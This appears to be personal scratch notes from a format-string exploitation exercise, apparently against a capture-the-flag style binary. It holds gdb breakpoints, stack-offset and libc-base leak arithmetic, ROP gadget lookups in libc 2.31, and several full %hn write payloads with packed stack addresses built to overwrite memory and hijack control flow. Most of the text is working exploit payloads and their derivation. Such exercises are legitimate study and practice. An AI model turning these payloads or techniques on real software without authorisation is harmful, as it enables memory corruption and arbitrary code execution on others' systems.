use '%c'*(position-1) + '%n' to get the equivalent '%position$n'

bbbaaaaaaaa.7f150def8723.0.7f150de19077.14.24.3d019dfe69.7ffc88e7d05d.0.7ffc88e7d0c0.7f150df08580.7ffc88e7d0b0.0.7f150defd520.3.0.0.0.0.677f9a5f.7f150df374f8.7ffc88e7d1d8.706e692072756f59.20203a7369207475.2020202020202020.2020202020202020.2020202020202020.2020202020202020.2020202020202020.6262620a20202020.6161616161616161. 
total words = 31, so write will start from 30
len("Your input is:                                              \n") = 61

// call func   // next instruction is main + 346
b *main+341
// 1st printf
b *func+458  
// 2nd printf
b *func+601
// ret of func
b *func+636

// call read
b *func+363
// puts call
b *func+434
// call read
b *func+518
// call puts
b *func+577

len('%p'+' %p'*159) = 479
479%8 = 7
479/7 = 68

0x7ffd8bb9ca30 - 0x7ffd8bb9c9b0 = 128/8 = 16 = rdi - rsp
16 (rdi-rsp) + 6 (stack location) + 7 (61/8) = 29 + 1 for remaining 5 chars = 30
61%8 = 5
61/8 = 7

0x7ffd8bb9ce50 - 0x7ffd8bb9c9b0 = 1184/8 = 148 = rbp func - rsp func
use '%c'*(position-1) + '%n' to get the equivalent '%position$n'

info proc map // libc base 
vmmap // gives memory map
0x7f668abdc000 0x00007f668abdc000  0x7f3134fa0000 // libc bases
0x1ed723 0x10e077  // offset to calculate libc for position 1 and 3,  libc_base = leaked libc base - offset

0x7fff9dbb2c00 - 0x7fff9dbb2760 = 1184/8 = 148 = rbp - rsp
rbp location = 148 + 8 = 156

0x7fff9dbb27e0 - 0x7fff9dbb2760 = 128/8=16 = rdi - rsp

'AAA%2858c%37$hn%24108c%38$hn%5529c%39$hn%32977c%40$hnaaaaba(\xc6f3\xff\x7f\x00\x00*\xc6f3\xff\x7f\x0
0\x00,\xc6f3\xff\x7f\x00\x00.\xc6f3\xff\x7f\x00\x00

AAA%2858c%37hn%24108c%38hn%5529c%39hn%32977c%40hnaaaaba(\xc6f3\xff\x7f\x00\x00*\xc6f3\xff\x7f\x00\x0
0,\xc6f3\xff\x7f\x00\x00.\xc6f3\xff\x7f\x00\x00


Q - AAA%100c%4$hn%110c%5$hn

1) AAA%100c%c%c%c%hn%110c%hn
2) AAA%100c%c%c%c%hn%110c%c%c%c%c%hn
3) AAA%100c%c%c%c%hn%110c%c%hn   
4) AAA%c%c%c%100c%hn%110c%hn   // can we prepend %c in start of payload instead of midddle ?

0x7ffe627c44d8 ◂— 0x7c47806161616e68
0x7ffe627c44e0 ◂— 0x7c477000007ffe62
0x7ffe627c44e8 ◂— 0x7c476c00007ffe62

b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%276c%67$hn%139c%68$hn%4995c%69$hn%70$hn%1c%71$hn%1c%72$hn%16c%73
$hn%11c%74$hn%15444c%75$hn%11773c%76$hn%77$hn%78$hn%79$hn%80$hn%81$hn%18525c%82$hn%1093c%83$hn%3800c%8
4$hn%9366c%85$hn%86$hn%87$hn%88$hn%89$hn%90$hn%91$hn%92$hn%93$hn%94$hn%95$hn%96$hn%97$hn%98$hn%99$hn%1
00$hn%31c%101$hn%59c%102$hn\x98\x8ai\x90\xff\x7f\x00\x00\x80\x8ai\x90\xff\x7f\x00\x00j\x8ai\x90\xff\x7
f\x00\x00\xaa\x8ai\x90\xff\x7f\x00\x00z\x8ai\x90\xff\x7f\x00\x00\x9a\x8ai\x90\xff\x7f\x00\x00\x8a\x8ai
\x90\xff\x7f\x00\x00r\x8ai\x90\xff\x7f\x00\x00p\x8ai\x90\xff\x7f\x00\x00l\x8ai\x90\xff\x7f\x00\x00t\x8
ai\x90\xff\x7f\x00\x00|\x8ai\x90\xff\x7f\x00\x00\x8c\x8ai\x90\xff\x7f\x00\x00\x9c\x8ai\x90\xff\x7f\x00
\x00\xac\x8ai\x90\xff\x7f\x00\x00\xa8\x8ai\x90\xff\x7f\x00\x00\x88\x8ai\x90\xff\x7f\x00\x00h\x8ai\x90\
xff\x7f\x00\x00n\x8ai\x90\xff\x7f\x00\x00v\x8ai\x90\xff\x7f\x00\x00~\x8ai\x90\xff\x7f\x00\x00\x82\x8ai
\x90\xff\x7f\x00\x00\x84\x8ai\x90\xff\x7f\x00\x00\x86\x8ai\x90\xff\x7f\x00\x00\x8e\x8ai\x90\xff\x7f\x0
0\x00\x90\x8ai\x90\xff\x7f\x00\x00\x92\x8ai\x90\xff\x7f\x00\x00\x94\x8ai\x90\xff\x7f\x00\x00\x96\x8ai\
x90\xff\x7f\x00\x00\x9e\x8ai\x90\xff\x7f\x00\x00\xa2\x8ai\x90\xff\x7f\x00\x00\xa4\x8ai\x90\xff\x7f\x00
\x00\xa6\x8ai\x90\xff\x7f\x00\x00\xae\x8ai\x90\xff\x7f\x00\x00x\x8ai\x90\xff\x7f\x00\x00\xa0\x8ai\x90\
xff\x7f\x00\x00

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%
c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%210c%hn%139c%hn%4995c%%hnhn%1c%hn%
1c%hn%16c%hn%11c%hn%15444c%hn%11773c%%hn%hn%hn%hn%hnhn%18525c%hn%1093c%hn%3800c%hn%9366c%%hn%hn%hn%hn%
hn%hn%hn%hn%hn%hn%hn%hn%hn%hn%hnhn%31c%hn%59c%hn\x98\x8ai\x90\xff\x7f\x00\x00\x80\x8ai\x90\xff\x7f\x00
\x00j\x8ai\x90\xff\x7f\x00\x00\xaa\x8ai\x90\xff\x7f\x00\x00z\x8ai\x90\xff\x7f\x00\x00\x9a\x8ai\x90\xff
\x7f\x00\x00\x8a\x8ai\x90\xff\x7f\x00\x00r\x8ai\x90\xff\x7f\x00\x00p\x8ai\x90\xff\x7f\x00\x00l\x8ai\x9
0\xff\x7f\x00\x00t\x8ai\x90\xff\x7f\x00\x00|\x8ai\x90\xff\x7f\x00\x00\x8c\x8ai\x90\xff\x7f\x00\x00\x9c
\x8ai\x90\xff\x7f\x00\x00\xac\x8ai\x90\xff\x7f\x00\x00\xa8\x8ai\x90\xff\x7f\x00\x00\x88\x8ai\x90\xff\x
7f\x00\x00h\x8ai\x90\xff\x7f\x00\x00n\x8ai\x90\xff\x7f\x00\x00v\x8ai\x90\xff\x7f\x00\x00~\x8ai\x90\xff
\x7f\x00\x00\x82\x8ai\x90\xff\x7f\x00\x00\x84\x8ai\x90\xff\x7f\x00\x00\x86\x8ai\x90\xff\x7f\x00\x00\x8
e\x8ai\x90\xff\x7f\x00\x00\x90\x8ai\x90\xff\x7f\x00\x00\x92\x8ai\x90\xff\x7f\x00\x00\x94\x8ai\x90\xff\
x7f\x00\x00\x96\x8ai\x90\xff\x7f\x00\x00\x9e\x8ai\x90\xff\x7f\x00\x00\xa2\x8ai\x90\xff\x7f\x00\x00\xa4
\x8ai\x90\xff\x7f\x00\x00\xa6\x8ai\x90\xff\x7f\x00\x00\xae\x8ai\x90\xff\x7f\x00\x00x\x8ai\x90\xff\x7f\
x00\x00\xa0\x8ai\x90\xff\x7f\x00\x00


=============   

b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%415c%67$hn%8481c%68$hn%69$hn%70$hn%1c%71$hn%17c%72$hn%10c%73$hn%17681c%74$hn%1093c%75$hn%3800c%76$hn%1002c%77$hn%78$hn%79$hn%80$hn%81$hn%82$hn%8395c%83$hn%341c%84$hn%20607c%85$hn%3597c%86$hn%87$hn%88$hn%89$hn%90$hn%91$hn%92$hn%93$hn%94$hn%95$hn%96$hn%97$hn%98$hn%99$hn%100$hn%101$hn%90c%102$hnaaP'\xa5\xea\xfc\x7f\x00\x00:'\xa5\xea\xfc\x7f\x00\x00J'\xa5\xea\xfc\x7f\x00\x00z'\xa5\xea\xfc\x7f\x00\x00j'\xa5\xea\xfc\x7f\x00\x00Z'\xa5\xea\xfc\x7f\x00\x00B'\xa5\xea\xfc\x7f\x00\x00x'\xa5\xea\xfc\x7f\x00\x00X'\xa5\xea\xfc\x7f\x00\x008'\xa5\xea\xfc\x7f\x00\x00<'\xa5\xea\xfc\x7f\x00\x00D'\xa5\xea\xfc\x7f\x00\x00L'\xa5\xea\xfc\x7f\x00\x00\\'\xa5\xea\xfc\x7f\x00\x00l'\xa5\xea\xfc\x7f\x00\x00|'\xa5\xea\xfc\x7f\x00\x00H'\xa5\xea\xfc\x7f\x00\x00h'\xa5\xea\xfc\x7f\x00\x00@'\xa5\xea\xfc\x7f\x00\x00>'\xa5\xea\xfc\x7f\x00\x00F'\xa5\xea\xfc\x7f\x00\x00N'\xa5\xea\xfc\x7f\x00\x00R'\xa5\xea\xfc\x7f\x00\x00T'\xa5\xea\xfc\x7f\x00\x00V'\xa5\xea\xfc\x7f\x00\x00^'\xa5\xea\xfc\x7f\x00\x00`'\xa5\xea\xfc\x7f\x00\x00b'\xa5\xea\xfc\x7f\x00\x00d'\xa5\xea\xfc\x7f\x00\x00f'\xa5\xea\xfc\x7f\x00\x00n'\xa5\xea\xfc\x7f\x00\x00r'\xa5\xea\xfc\x7f\x00\x00t'\xa5\xea\xfc\x7f\x00\x00v'\xa5\xea\xfc\x7f\x00\x00~'\xa5\xea\xfc\x7f\x00\x00p'\xa5\xea\xfc\x7f\x00\x00"
new_exploit 
b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%349c%hn%8481c%hn%hn%hn%1c%hn%17c%hn%10c%hn%17681c%hn%1093c%hn%3800c%hn%1002c%hn%hn%hn%hn%hn%hn%8395c%hn%341c%hn%20607c%hn%3597c%hn%hn%hn%hn%hn%hn%hn%hn%hn%hn%hn%hn%hn%hn%hn%hn%90c%hnaaP'\xa5\xea\xfc\x7f\x00\x00:'\xa5\xea\xfc\x7f\x00\x00J'\xa5\xea\xfc\x7f\x00\x00z'\xa5\xea\xfc\x7f\x00\x00j'\xa5\xea\xfc\x7f\x00\x00Z'\xa5\xea\xfc\x7f\x00\x00B'\xa5\xea\xfc\x7f\x00\x00x'\xa5\xea\xfc\x7f\x00\x00X'\xa5\xea\xfc\x7f\x00\x008'\xa5\xea\xfc\x7f\x00\x00<'\xa5\xea\xfc\x7f\x00\x00D'\xa5\xea\xfc\x7f\x00\x00L'\xa5\xea\xfc\x7f\x00\x00\\'\xa5\xea\xfc\x7f\x00\x00l'\xa5\xea\xfc\x7f\x00\x00|'\xa5\xea\xfc\x7f\x00\x00H'\xa5\xea\xfc\x7f\x00\x00h'\xa5\xea\xfc\x7f\x00\x00@'\xa5\xea\xfc\x7f\x00\x00>'\xa5\xea\xfc\x7f\x00\x00F'\xa5\xea\xfc\x7f\x00\x00N'\xa5\xea\xfc\x7f\x00\x00R'\xa5\xea\xfc\x7f\x00\x00T'\xa5\xea\xfc\x7f\x00\x00V'\xa5\xea\xfc\x7f\x00\x00^'\xa5\xea\xfc\x7f\x00\x00`'\xa5\xea\xfc\x7f\x00\x00b'\xa5\xea\xfc\x7f\x00\x00d'\xa5\xea\xfc\x7f\x00\x00f'\xa5\xea\xfc\x7f\x00\x00n'\xa5\xea\xfc\x7f\x00\x00r'\xa5\xea\xfc\x7f\x00\x00t'\xa5\xea\xfc\x7f\x00\x00v'\xa5\xea\xfc\x7f\x00\x00~'\xa5\xea\xfc\x7f\x00\x00p'\xa5\xea\xfc\x7f\x00\x00"


ROPgadget --binary /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep '10db64'
0x000000000010db64 : mov eax, 0x5a ; syscall

 ROPgadget --binary /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep '578c8'
 0x00000000000578c8 : leave ; ret

 rbp - rdi = 0x7ffe88ac5ba0 - 0x7ffe88ac5780 = 1056